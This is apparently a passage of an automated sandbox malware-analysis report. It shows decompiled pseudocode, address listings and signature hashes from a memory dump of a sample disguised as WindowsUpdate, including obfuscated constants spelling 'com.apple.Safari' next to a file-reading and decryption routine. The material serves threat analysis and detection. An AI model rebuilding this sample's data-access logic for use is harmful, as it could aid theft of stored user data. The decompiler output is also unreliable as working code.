															E002CFB27(_t304 + 0xc,  &_v1328, _t268,  &_v5680,  &_v5808,  &_v5552,  &_v16, 0);
															_t218 = _v1328;
															_t318 = _t318 + 0x58;
															__eflags = _t218;
															if(_t218 == 0) {
																L25:
																_t309 = _t309 + _t268 + 0xc;
																__eflags = _t309;
																goto L26;
															} else {
																__eflags = _t218 - 8;
																if(_t218 == 8) {
																	goto L25;
																} else {
																	__eflags = _t313 + _t268 - 0x52d - ( *(_t313 + _t268 - 0x52d) & 0x000000ff) + 1;
																	E00327C87(_t313 + _t268 - 0x52d - ( *(_t313 + _t268 - 0x52d) & 0x000000ff) + 1, 0,  *(_t313 + _t268 - 0x52d) & 0x000000ff);
																	_t286 =  &_v1328;
																	_t320 = _t318 + 0xc;
																	_t301 = _t286 + 2;
																	do {
																		_t221 =  *_t286;
																		_t286 = _t286 + 2;
																		__eflags = _t221;
																	} while (_t221 != 0);
																	_t287 = _t286 - _t301;
																	__eflags = _t287;
																	 *0x470048(0, 0,  &_v1328, _t287 >> 1,  &_v2352, 0x400, 0, 0);
																	_t225 =  &_v1328;
																	_t298 = _t225 + 2;
																	do {
																		_t289 =  *_t225;
																		_t225 = _t225 + 2;
																		__eflags = _t289;
																	} while (_t289 != 0);
																	_t227 = _t225 - _t298 >> 1;
																	__eflags = _t227 - 0x400;
																	if(_t227 >= 0x400) {
																		E00327EEC();
																		asm("sbb al, 0x1e");
																		 *_t268 =  *_t268 + _t289;
																		_push(ds);
																		 *((intOrPtr*)(_t298 + 0x1e)) =  *((intOrPtr*)(_t298 + 0x1e)) + _t298;
																		 *((intOrPtr*)(_t309 + 0x1e)) =  *((intOrPtr*)(_t309 + 0x1e)) + _t268;
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		_push(_t313);
																		_t314 = _t320;
																		E00327307(0x27bc);
																		_v60 =  *0x481f80 ^ _t314;
																		_push(_t304);
																		_t305 = _v44;
																		_push(0x2710);
																		_v204 = 0xf8a8ac1d;
																		_v200 = 0x3e48b8d3;
																		_v196 = 0xa3e7d48;
																		_v192 = 0x26dd0762;
																		_v188 = 0x38167e6;
																		_v184 = 0xa513b2e7;
																		_v180 = 0x4fee79b0;
																		_v176 = 0xed15410f;
																		_v172 = 0xe58c147b;
																		_v168 = 0xc10d464b;
																		_v164 = 0xe7d6fe8e;
																		_v160 = 0x8b067527;
																		_v156 = 0xfdc0049;
																		_v152 = 0xfd9ea030;
																		_v148 = 0xc8f18509;
																		_v144 = 0x8c175aa;
																		_v140 = 0xe2017905;
																		_v136 = 0x80afd897;
																		_v132 = 0x710b6038;
																		_v128 = 0x7753680e;
																		_v124 = 0xf6610f2f;
																		_v120 = 0x5c8f8e1d;
																		_v116 = 0x74213db2;
																		_v112 = 0x6b54b40;
																		_v108 = 0xbd7aab6e;
																		_v104 = 0x327ea98b;
																		_v100 = 0x24066e8f;
																		_v96 = 0xa5a429d9;
																		_v92 = 0xfd2326be;
																		_v88 = 0xf4cf1ee;
																		_v84 = 0xfb585e74;
																		_v80 = 0x91ef7491;
																		_v76 = 0x2e6d6f63;
																		_v72 = 0x6c707061;
																		_v68 = 0x61532e65;
																		_v64 = 0x69726166;
																		_t239 = E002CB777(_v48,  &_v10204);
																		__eflags = _t239;
																		if(_t239 == 0) {
																			L34:
																			_pop(_t306);
																			__eflags = _v16 ^ _t314;
																			return E003272F2(0, _t268, _v16 ^ _t314, _t298, _t306, _t309);
																		} else {
																			_v10168 = _t239;
																			_v10172 =  &_v160;
																			_v10164 =  &_v10160;
																			_v10176 = 0x90;
																			_t246 =  *0x470040( &_v10168, 0,  &_v10176, 0, 0, 0,  &_v10184);
																			__eflags = _t246;
																			if(_t246 != 0) {
																				_t311 =  *_v10180 & 0x000000ff;
																				E00327337(_t305,  &(_v10180[4]), _t311);
																				 *((char*)(_t305 + _t311)) = 0;
																				_t312 = _t309;
																				__eflags = _v16 ^ _t314;
																				_pop(_t307);
																				return E003272F2(1, _t268, _v16 ^ _t314, _t298, _t307, _t312);
																			} else {
																				 *0x470124();
																				goto L34;
																			}
																		}
																	} else {
																		 *((char*)(_t313 + _t227 - 0x92c)) = _t289;
																		_t254 = E0032835E( &_v2352, 0x470854, 4);
																		_t318 = _t320 + 0xc;
																		__eflags = _t254;
																		if(_t254 != 0) {
																			_t256 = _v5816 - 1;
																			__eflags = _t256 - 3;
																			if(_t256 <= 3) {
																				goto ( *((intOrPtr*)(0x401ee4 + _t256 * 4)));
																			}
																			_v5816 = 0;
																		} else {
																			E00327AF9( &_v4400, 0x400,  &_v2352);
																			_t318 = _t318 + 0xc;
																			_v5816 = 1;
																		}
																		goto L25;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									goto L36;
								}
								_pop(_t302);
								goto L29;
							}
						} else {
							_push(_v5820);
							_t260 = E00329010(_t263, __edi, __esi, _t326);
							_pop(_t270);
							return E003272F2(_t260, _t270, _v8 ^ _t313, __edx, __edi, __esi);
						}
					}
				}
				L36:
			}



























































































































                                                                                                                    0x002cc197
                                                                                                                    0x002cc197
                                                                                                                    0x002cc197
                                                                                                                    0x002cc197
                                                                                                                    0x002cc19f
                                                                                                                    0x002cc1ab
                                                                                                                    0x002cc1be
                                                                                                                    0x002cc1c8
                                                                                                                    0x002cc1d2
                                                                                                                    0x002cc1dc
                                                                                                                    0x002cc1e6
                                                                                                                    0x002cc1ef
                                                                                                                    0x002cc1f6
                                                                                                                    0x002cc1fb
                                                                                                                    0x002cc201
                                                                                                                    0x002cc206
                                                                                                                    0x002cc647
                                                                                                                    0x002cc64a
                                                                                                                    0x002cc654
                                                                                                                    0x002cc20c
                                                                                                                    0x002cc20c
                                                                                                                    0x002cc20e
                                                                                                                    0x00000000
                                                                                                                    0x002cc214
                                                                                                                    0x002cc214
                                                                                                                    0x002cc215
                                                                                                                    0x002cc217
                                                                                                                    0x002cc218
                                                                                                                    0x002cc219
                                                                                                                    0x002cc21e
                                                                                                                    0x002cc224
                                                                                                                    0x002cc229
                                                                                                                    0x002cc22c
                                                                                                                    0x002cc232
                                                                                                                    0x002cc237
                                                                                                                    0x002cc23a
                                                                                                                    0x002cc240
                                                                                                                    0x002cc242
                                                                                                                    0x002cc261
                                                                                                                    0x002cc262
                                                                                                                    0x002cc268
                                                                                                                    0x002cc276
                                                                                                                    0x002cc27d
                                                                                                                    0x002cc282
                                                                                                                    0x002cc288
                                                                                                                    0x002cc28d
                                                                                                                    0x002cc293
                                                                                                                    0x002cc296
                                                                                                                    0x002cc298
                                                                                                                    0x002cc29a
                                                                                                                    0x002cc63c
                                                                                                                    0x002cc63d
                                                                                                                    0x002cc645
                                                                                                                    0x002cc646
                                                                                                                    0x00000000
                                                                                                                    0x002cc2a0
                                                                                                                    0x002cc2a0
                                                                                                                    0x002cc2a7
                                                                                                                    0x002cc2b0
                                                                                                                    0x002cc2b5
                                                                                                                    0x002cc2b8
                                                                                                                    0x002cc2ba
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x002cc2c0
                                                                                                                    0x002cc2c3
                                                                                                                    0x002cc2c3
                                                                                                                    0x002cc2c6
                                                                                                                    0x002cc2c8
                                                                                                                    0x002cc2ce
                                                                                                                    0x002cc2ce
                                                                                                                    0x002cc2d1
                                                                                                                    0x002cc2d3
                                                                                                                    0x002cc62d
                                                                                                                    0x002cc62d
                                                                                                                    0x002cc633
                                                                                                                    0x002cc635
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x002cc2d9
                                                                                                                    0x002cc2e1
                                                                                                                    0x002cc2e3
                                                                                                                    0x00000000
                                                                                                                    0x002cc2e9
                                                                                                                    0x002cc2fc
                                                                                                                    0x002cc302
                                                                                                                    0x002cc31d
                                                                                                                    0x002cc323
                                                                                                                    0x002cc331
                                                                                                                    0x002cc336
                                                                                                                    0x002cc338
                                                                                                                    0x002cc627
                                                                                                                    0x002cc627
                                                                                                                    0x00000000
                                                                                                                    0x002cc33e
                                                                                                                    0x002cc349
                                                                                                                    0x002cc34b
                                                                                                                    0x00000000
                                                                                                                    0x002cc351
                                                                                                                    0x002cc351
                                                                                                                    0x002cc354
                                                                                                                    0x00000000
                                                                                                                    0x002cc35a
                                                                                                                    0x002cc35a
                                                                                                                    0x002cc35d
                                                                                                                    0x00000000
                                                                                                                    0x002cc363
                                                                                                                    0x002cc36a
                                                                                                                    0x002cc372
                                                                                                                    0x002cc378
                                                                                                                    0x002cc385
                                                                                                                    0x002cc38b
                                                                                                                    0x002cc395
                                                                                                                    0x002cc39e
                                                                                                                    0x002cc3a4
                                                                                                                    0x002cc3b3
                                                                                                                    0x002cc3b8
                                                                                                                    0x002cc3c4
                                                                                                                    0x002cc3cc
                                                                                                                    0x002cc3d1
                                                                                                                    0x002cc3de
                                                                                                                    0x002cc3e6
                                                                                                                    0x002cc3ee
                                                                                                                    0x002cc3f4
                                                                                                                    0x002cc3fe
                                                                                                                    0x002cc407
                                                                                                                    0x002cc40d
                                                                                                                    0x002cc41c
                                                                                                                    0x002cc42c
                                                                                                                    0x002cc43c
                                                                                                                    0x002cc44c
                                                                                                                    0x002cc454
                                                                                                                    0x002cc45a
                                                                                                                    0x002cc484
                                                                                                                    0x002cc48b
                                                                                                                    0x002cc490
                                                                                                                    0x002cc496
                                                                                                                    0x002cc499
                                                                                                                    0x002cc49b
                                                                                                                    0x002cc622
                                                                                                                    0x002cc625
                                                                                                                    0x002cc625
                                                                                                                    0x00000000
                                                                                                                    0x002cc4a1
                                                                                                                    0x002cc4a1
                                                                                                                    0x002cc4a3
                                                                                                                    0x00000000
                                                                                                                    0x002cc4a9
                                                                                                                    0x002cc4bb
                                                                                                                    0x002cc4bf
                                                                                                                    0x002cc4c4
                                                                                                                    0x002cc4ca
                                                                                                                    0x002cc4cd
                                                                                                                    0x002cc4d7
                                                                                                                    0x002cc4d7
                                                                                                                    0x002cc4da
                                                                                                                    0x002cc4dd
                                                                                                                    0x002cc4dd
                                                                                                                    0x002cc4eb
                                                                                                                    0x002cc4eb
                                                                                                                    0x002cc502
                                                                                                                    0x002cc508
                                                                                                                    0x002cc50e
                                                                                                                    0x002cc517
                                                                                                                    0x002cc517
                                                                                                                    0x002cc51a
                                                                                                                    0x002cc51d
                                                                                                                    0x002cc51d
                                                                                                                    0x002cc524
                                                                                                                    0x002cc526
                                                                                                                    0x002cc52b
                                                                                                                    0x002cc655
                                                                                                                    0x002cc65b
                                                                                                                    0x002cc65e
                                                                                                                    0x002cc660
                                                                                                                    0x002cc662
                                                                                                                    0x002cc666
                                                                                                                    0x002cc66c
                                                                                                                    0x002cc66d
                                                                                                                    0x002cc66e
                                                                                                                    0x002cc66f
                                                                                                                    0x002cc670
                                                                                                                    0x002cc671
                                                                                                                    0x002cc672
                                                                                                                    0x002cc673
                                                                                                                    0x002cc674
                                                                                                                    0x002cc675
                                                                                                                    0x002cc676
                                                                                                                    0x002cc677
                                                                                                                    0x002cc678
                                                                                                                    0x002cc67f
                                                                                                                    0x002cc68b
                                                                                                                    0x002cc691
                                                                                                                    0x002cc692
                                                                                                                    0x002cc695
                                                                                                                    0x002cc6a2
                                                                                                                    0x002cc6ac
                                                                                                                    0x002cc6b6
                                                                                                                    0x002cc6c0
                                                                                                                    0x002cc6ca
                                                                                                                    0x002cc6d4
                                                                                                                    0x002cc6db
                                                                                                                    0x002cc6e2
                                                                                                                    0x002cc6e9
                                                                                                                    0x002cc6f0
                                                                                                                    0x002cc6f7
                                                                                                                    0x002cc6fe
                                                                                                                    0x002cc705
                                                                                                                    0x002cc70c
                                                                                                                    0x002cc713
                                                                                                                    0x002cc71a
                                                                                                                    0x002cc721
                                                                                                                    0x002cc728
                                                                                                                    0x002cc72f
                                                                                                                    0x002cc736
                                                                                                                    0x002cc73d
                                                                                                                    0x002cc744
                                                                                                                    0x002cc74b
                                                                                                                    0x002cc752
                                                                                                                    0x002cc759
                                                                                                                    0x002cc760
                                                                                                                    0x002cc767
                                                                                                                    0x002cc76e
                                                                                                                    0x002cc775
                                                                                                                    0x002cc77c
                                                                                                                    0x002cc783
                                                                                                                    0x002cc78a
                                                                                                                    0x002cc791
                                                                                                                    0x002cc798
                                                                                                                    0x002cc79f
                                                                                                                    0x002cc7a6
                                                                                                                    0x002cc7ad
                                                                                                                    0x002cc7b5
                                                                                                                    0x002cc7b7
                                                                                                                    0x002cc80e
                                                                                                                    0x002cc810
                                                                                                                    0x002cc814
                                                                                                                    0x002cc81e
                                                                                                                    0x002cc7b9
                                                                                                                    0x002cc7b9
                                                                                                                    0x002cc7c5
                                                                                                                    0x002cc7ee
                                                                                                                    0x002cc7f4
                                                                                                                    0x002cc7fe
                                                                                                                    0x002cc804
                                                                                                                    0x002cc806
                                                                                                                    0x002cc826
                                                                                                                    0x002cc82f
                                                                                                                    0x002cc83a
                                                                                                                    0x002cc83e
                                                                                                                    0x002cc83f
                                                                                                                    0x002cc846
                                                                                                                    0x002cc84f
                                                                                                                    0x002cc808
                                                                                                                    0x002cc808
                                                                                                                    0x00000000
                                                                                                                    0x002cc808
                                                                                                                    0x002cc806
                                                                                                                    0x002cc531
                                                                                                                    0x002cc533
                                                                                                                    0x002cc546
                                                                                                                    0x002cc54b
                                                                                                                    0x002cc54e
                                                                                                                    0x002cc550
                                                                                                                    0x002cc582
                                                                                                                    0x002cc583
                                                                                                                    0x002cc586
                                                                                                                    0x002cc58c
                                                                                                                    0x002cc58c
                                                                                                                    0x002cc618
                                                                                                                    0x002cc552
                                                                                                                    0x002cc565
                                                                                                                    0x002cc56a
                                                                                                                    0x002cc56d
                                                                                                                    0x002cc56d
                                                                                                                    0x00000000
                                                                                                                    0x002cc550
                                                                                                                    0x002cc52b
                                                                                                                    0x002cc4a3
                                                                                                                    0x002cc49b
                                                                                                                    0x002cc35d
                                                                                                                    0x002cc354
                                                                                                                    0x002cc34b
                                                                                                                    0x002cc338
                                                                                                                    0x002cc2e3
                                                                                                                    0x00000000
                                                                                                                    0x002cc2d3
                                                                                                                    0x002cc63b
                                                                                                                    0x00000000
                                                                                                                    0x002cc63b
                                                                                                                    0x002cc244
                                                                                                                    0x002cc244
                                                                                                                    0x002cc24a
                                                                                                                    0x002cc252
                                                                                                                    0x002cc260
                                                                                                                    0x002cc260
                                                                                                                    0x002cc242
                                                                                                                    0x002cc20e
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __wfopen_s.LIBCMT ref: 002CC1F6
                                                                                                                    • _fseek.LIBCMT ref: 002CC219
                                                                                                                    • _malloc.LIBCMT ref: 002CC232
                                                                                                                      • Part of subcall function 00327BCE: __FF_MSGBANNER.LIBCMT ref: 00327BE5
                                                                                                                      • Part of subcall function 00327BCE: __NMSG_WRITE.LIBCMT ref: 00327BEC
                                                                                                                    • __fread_nolock.LIBCMT ref: 002CC27D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: __fread_nolock__wfopen_s_fseek_malloc
                                                                                                                    • String ID: H}>$I$appl$com.$e.Sa$fari
                                                                                                                    • API String ID: 375348327-3462864509
                                                                                                                    • Opcode ID: 1a873c5dce213d705d04b015f7dcf2c0fe33bfaeac4afa8ac49061306c789284
                                                                                                                    • Instruction ID: 0e54683d089cf60dac2f58b8d8cd690ca87d9eb51879c9bd5a3dee95bec9a6e5
                                                                                                                    • Opcode Fuzzy Hash: 1a873c5dce213d705d04b015f7dcf2c0fe33bfaeac4afa8ac49061306c789284
                                                                                                                    • Instruction Fuzzy Hash: 9DF17FB5D042299FDB21DFA4DD81BDEBBB8EF08300F1442DAE549AB241D7319A94CF91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 002CF0B7 Relevance: 19.6, APIs: 13, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 47%
                                                                                                                    			E002CF0B7() {
				signed int _v8;
				signed short _v24;
				char _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t14;
				void* _t17;
				void* _t28;
				intOrPtr* _t31;
				void* _t35;
				signed int _t36;
				intOrPtr* _t38;
				signed int _t39;

				_v8 =  *0x481f80 ^ _t39;
				_t31 =  *0x470104;
				_t7 =  *_t31(0xfffffff5);
				_t8 =  *0x47004c(_t7,  &_v32);
				_t36 = _v24 & 0x0000ffff;
				_t44 = _t8;
				if(_t8 == 0) {
					_t36 = 0xf;
				}
				_t9 =  *_t31(0xfffffff5);
				_t38 =  *0x470050;
				 *_t38(_t9, 0xf);
				E00329C53(_t31, _t36, _t38, _t44);
				E00329C53(_t31, _t36, _t38, _t44);
				E00329C53(_t31, _t36, _t38, _t44);
				_t14 =  *_t31(0xfffffff5, 0x4703d0, 0x470398, 0x470378, 0x470360, 0x47035c, 0x470318);
				 *_t38(_t14, 0xf);
				E00329C53(_t31, _t36, _t38, _t44);
				_t17 =  *_t31(0xfffffff5, 0x470318);
				 *_t38(_t17, 0xa);
				E00329C53(_t31, _t36, _t38, _t44);
				E00329C53(_t31, _t36, _t38, _t44);
				E00329C53(_t31, _t36, _t38, _t44);
				E00329C53(_t31, _t36, _t38, _t44);
				E00329C53(_t31, _t36, _t38, _t44);
				E00329C53(_t31, _t36, _t38, _t44);
				E00329C53(_t31, _t36, _t38, _t44);
				E00329C53(_t31, _t36, _t38, _t44);
				E00329C53(_t31, _t36, _t38, _t44);
				_t28 =  *_t31(0xfffffff5, 0x47051c, 0x47050c, 0x4703dc, 0x4704f0, 0x4704d0, 0x4703dc, 0x470480, 0x470470, 0x4703dc, 0x470434, 0x470424, 0x4703f0, 0x4703dc);
				return E003272F2( *_t38(_t36 | 0x00000008), _t31, _v8 ^ _t39, _t35, _t36 | 0x00000008, _t38, _t28);
			}





















                                                                                                                    0x002cf0c4
                                                                                                                    0x002cf0c8
                                                                                                                    0x002cf0d2
                                                                                                                    0x002cf0d9
                                                                                                                    0x002cf0df
                                                                                                                    0x002cf0e3
                                                                                                                    0x002cf0e5
                                                                                                                    0x002cf0e7
                                                                                                                    0x002cf0e7
                                                                                                                    0x002cf0ee
                                                                                                                    0x002cf0f0
                                                                                                                    0x002cf0f9
                                                                                                                    0x002cf100
                                                                                                                    0x002cf114
                                                                                                                    0x002cf123
                                                                                                                    0x002cf12d
                                                                                                                    0x002cf132
                                                                                                                    0x002cf139
                                                                                                                    0x002cf143
                                                                                                                    0x002cf148
                                                                                                                    0x002cf154
                                                                                                                    0x002cf15e
                                                                                                                    0x002cf168
                                                                                                                    0x002cf177
                                                                                                                    0x002cf181
                                                                                                                    0x002cf190
                                                                                                                    0x002cf19a
                                                                                                                    0x002cf1a9
                                                                                                                    0x002cf1b3
                                                                                                                    0x002cf1bd
                                                                                                                    0x002cf1d6

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000C.00000002.333085217.00000000002C2000.00000002.00000001.01000000.00000008.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                    • Associated: 0000000C.00000002.333073063.00000000002C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_12_2_2c0000_WindowsUpdate.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _wprintf
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2738768116-0
                                                                                                                    • Opcode ID: 5c9291e5854e53c87d8811a1cd8e349ed07527149dd1dd5fd2e6ad2ec99ad9bd
                                                                                                                    • Instruction ID: 94f9617d16f8533b4248e5991a75004526b46f7b1e3ffc3b80c16dcd985bbb08
                                                                                                                    • Opcode Fuzzy Hash: 5c9291e5854e53c87d8811a1cd8e349ed07527149dd1dd5fd2e6ad2ec99ad9bd
                                                                                                                    • Instruction Fuzzy Hash: 4C218E61B92735F6861177F4BD47FDE3B989B41F28F20C227BA1CBA0C2D8A8550045BE
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0032AC3B Relevance: 16.8, APIs: 11, Instructions: 261COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E0032AC3B(signed int __edx, signed int _a4, signed int _a8) {
				char _v8;
				char _v12;
				char _v16;
				signed int _v20;
				char _v24;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t100;
				signed int _t102;
				void* _t103;
				signed int _t106;
				signed int _t109;
				signed int _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t127;
				signed int _t129;
				signed int _t131;
				signed int _t136;
				signed int _t142;
				signed int _t148;
				signed int* _t151;
				signed int _t155;
				signed int _t159;
				void* _t161;
				signed int _t162;
				signed int _t163;
				signed int _t166;
				void* _t171;
				signed int _t174;
				signed int _t183;
				unsigned int _t184;
				signed int _t188;
				signed int* _t201;
				signed int _t203;
				signed int _t207;
				signed int _t208;
				signed int _t210;
				signed int _t212;
				void* _t214;
				void* _t216;
				signed int _t217;
				signed int _t218;

				_t183 = __edx;
				_t201 = _a4;
				_v12 = 0;
				_v16 = 0;
				_v8 = 0;
				if(_t201 != 0) {
					E00327C87(_t201, 0xff, 0x24);
					_t207 = _a8;
					__eflags = _t207;
					if(_t207 == 0) {
						goto L1;
					} else {
						__eflags =  *(_t207 + 4);
						if(__eflags > 0) {
							L9:
							_t103 = 7;
							__eflags =  *(_t207 + 4) - _t103;
							if(__eflags < 0) {
								L12:
								E003328A4(0, _t183, _t201, _t207, __eflags);
								_t106 = E003325FD( &_v12);
								__eflags = _t106;
								if(_t106 != 0) {
									L45:
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E0032C6A6(_t106, 0, _t183);
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									asm("int3");
									_push(_t201);
									_push(_t207);
									_push(0);
									_t203 = 0;
									_t109 = _v48;
									__eflags = _t109;
									if(_t109 < 0) {
										_t203 = 1;
										__eflags = 1;
										asm("sbb eax, 0x0");
										_v48 =  ~_t109;
										_v52 =  ~_v52;
									}
									_t111 = _v40;
									__eflags = _t111;
									if(_t111 < 0) {
										_t203 = _t203 + 1;
										__eflags = _t203;
										_t111 =  ~_t111;
										asm("sbb eax, 0x0");
										_v40 = _t111;
										_v44 =  ~_v44;
									}
									_t112 = _t111;
									__eflags = _t112;
									if(_t112 != 0) {
										_t155 = _t112;
										_t166 = _v44;
										_t184 = _v48;
										_t113 = _v52;
										do {
											asm("rcr ecx, 1");
											_t184 = _t184 >> 1;
											asm("rcr eax, 1");
											_t155 = _t155 >> 1;
											__eflags = _t155;
										} while (_t155 != 0);
										_t114 = _t113 / _t166;
										_t210 = _t114;
										_t116 = _v44;
										_t117 = _t116 * _t210;
										_t188 = (_t116 * _t210 >> 0x20) + _t114 * _v40;
										__eflags = _t188;
										if(_t188 < 0) {
											L58:
											_t210 = _t210 - 1;
											__eflags = _t210;
										} else {
											__eflags = _t188 - _v48;
											if(__eflags > 0) {
												goto L58;
											} else {
												if(__eflags >= 0) {
													__eflags = _t117 - _v52;
													if(_t117 > _v52) {
														goto L58;
													}
												}
											}
										}
										__eflags = 0;
										_t118 = _t210;
									} else {
										_t118 = _v52 / _v44;
									}
									__eflags = _t203 == 1;
									if(_t203 == 1) {
										_t118 =  ~_t118;
										asm("sbb edx, 0x0");
									}
									return _t118;
								} else {
									_t106 = E00332627( &_v16);
									__eflags = _t106;
									if(_t106 != 0) {
										goto L45;
									} else {
										_t106 = E00332651( &_v8);
										__eflags = _t106;
										if(_t106 != 0) {
											goto L45;
										} else {
											_t159 =  *(_t207 + 4);
											_t171 =  *_t207;
											__eflags = _t159;
											if(__eflags < 0) {
												L23:
												_t102 = E0033267B(_t201, _t207);
												__eflags = _t102;
												if(_t102 == 0) {
													__eflags = _v12 - _t102;
													if(__eflags == 0) {
														L27:
														asm("cdq");
														_t212 = _t183;
														asm("cdq");
														_t161 =  *_t201 - _v8;
														asm("sbb esi, edx");
													} else {
														_push(_t201);
														_t142 = E003328F4(_t159, _t201, _t207, __eflags);
														__eflags = _t142;
														if(_t142 == 0) {
															goto L27;
														} else {
															_t201[8] = 1;
															asm("cdq");
															asm("cdq");
															_t161 =  *_t201 - _v16 + _v8;
															asm("sbb edx, esi");
															_a4 = _t183;
															_t212 = _t183;
														}
													}
													_t127 = E0032B087(_t161, _t212, 0x3c, 0);
													 *_t201 = _t127;
													__eflags = _t127;
													if(_t127 < 0) {
														_t127 = _t127 + 0x3c;
														_t161 = _t161 + 0xffffffc4;
														 *_t201 = _t127;
														asm("adc esi, 0xffffffff");
													}
													_push(0);
													_push(0x3c);
													_push(_t212);
													_push(_t161);
													L46();
													_t162 = _t183;
													asm("cdq");
													_t214 = _t127 + _t201[1];
													asm("adc ebx, edx");
													_t129 = E0032B087(_t214, _t162, 0x3c, 0);
													_t201[1] = _t129;
													__eflags = _t129;
													if(_t129 < 0) {
														_t129 = _t129 + 0x3c;
														_t214 = _t214 + 0xffffffc4;
														_t201[1] = _t129;
														asm("adc ebx, 0xffffffff");
													}
													_push(0);
													_push(0x3c);
													_push(_t162);
													_push(_t214);
													L46();
													_t163 = _t183;
													asm("cdq");
													_t216 = _t129 + _t201[2];
													asm("adc ebx, edx");
													_t131 = E0032B087(_t216, _t163, 0x18, 0);
													_t201[2] = _t131;
													__eflags = _t131;
													if(_t131 < 0) {
														_t131 = _t131 + 0x18;
														_t216 = _t216 + 0xffffffe8;
														_t201[2] = _t131;
														asm("adc ebx, 0xffffffff");
													}
													_push(0);
													_push(0x18);
													_push(_t163);
													_push(_t216);
													L46();
													_t174 = _t131;
													__eflags = _t183;
													if(__eflags < 0) {
														L43:
														asm("cdq");
														_t217 = 7;
														_t201[3] = _t201[3] + _t174;
														_t136 = _t201[3];
														_t201[6] = (_t201[6] + 7 + _t174) % _t217;
														__eflags = _t136;
														if(_t136 > 0) {
															goto L38;
														} else {
															_t201[3] = _t136 + 0x1f;
															_t54 = _t174 + 0x16d; // 0x16d
															_t201[7] = _t201[7] + _t54;
															_t201[5] = _t201[5] - 1;
															_t201[4] = 0xb;
														}
													} else {
														if(__eflags > 0) {
															L37:
															asm("cdq");
															_t218 = 7;
															_t39 =  &(_t201[3]);
															 *_t39 = _t201[3] + _t174;
															__eflags =  *_t39;
															_t201[6] = (_t201[6] + _t174) % _t218;
															L38:
															_t42 =  &(_t201[7]);
															 *_t42 = _t201[7] + _t174;
															__eflags =  *_t42;
														} else {
															__eflags = _t174;
															if(_t174 == 0) {
																__eflags = _t183;
																if(__eflags <= 0) {
																	if(__eflags < 0) {
																		goto L43;
																	} else {
																		__eflags = _t174;
																		if(_t174 < 0) {
																			goto L43;
																		}
																	}
																}
															} else {
																goto L37;
															}
														}
													}
													goto L39;
												}
											} else {
												if(__eflags > 0) {
													L18:
													asm("cdq");
													asm("sbb ebx, edx");
													_v24 = _t171 - _v8;
													_v20 = _t159;
													_t102 = E0033267B(_t201,  &_v24);
													__eflags = _t102;
													if(_t102 == 0) {
														__eflags = _v12 - _t102;
														if(__eflags == 0) {
															L39:
															_t102 = 0;
														} else {
															_push(_t201);
															_t148 = E003328F4(_t159, _t201, _t207, __eflags);
															__eflags = _t148;
															if(_t148 == 0) {
																goto L39;
															} else {
																asm("cdq");
																_v24 = _v24 - _v16;
																asm("sbb [ebp-0x10], edx");
																_t102 = E0033267B(_t201,  &_v24);
																__eflags = _t102;
																if(_t102 == 0) {
																	_t201[8] = 1;
																	goto L39;
																}
															}
														}
													}
												} else {
													__eflags = _t171 - 0x3f480;
													if(_t171 <= 0x3f480) {
														goto L23;
													} else {
														goto L18;
													}
												}
											}
											goto L3;
										}
									}
								}
							} else {
								if(__eflags > 0) {
									goto L8;
								} else {
									__eflags =  *_t207 - 0x93406fff;
									if(__eflags > 0) {
										goto L8;
									} else {
										goto L12;
									}
								}
							}
						} else {
							if(__eflags < 0) {
								L8:
								_t151 = E0032C705();
								_t208 = 0x16;
								 *_t151 = _t208;
								goto L2;
							} else {
								__eflags =  *_t207;
								if( *_t207 >= 0) {
									goto L9;
								} else {
									goto L8;
								}
							}
						}
					}
				} else {
					L1:
					_t100 = E0032C705();
					_t208 = 0x16;
					 *_t100 = _t208;
					E0032C696();
					L2:
					_t102 = _t208;
					L3:
					return _t102;
				}
			}























































                                                                                                                    0x0032ac3b
                                                                                                                    0x0032ac46
                                                                                                                    0x0032ac49
                                                                                                                    0x0032ac4c
                                                                                                                    0x0032ac4f
                                                                                                                    0x0032ac54
                                                                                                                    0x0032ac74
                                                                                                                    0x0032ac79
                                                                                                                    0x0032ac7f
                                                                                                                    0x0032ac81
                                                                                                                    0x00000000
                                                                                                                    0x0032ac83
                                                                                                                    0x0032ac83
                                                                                                                    0x0032ac86
                                                                                                                    0x0032ac9a
                                                                                                                    0x0032ac9c
                                                                                                                    0x0032ac9d
                                                                                                                    0x0032aca0
                                                                                                                    0x0032acac
                                                                                                                    0x0032acac
                                                                                                                    0x0032acb5
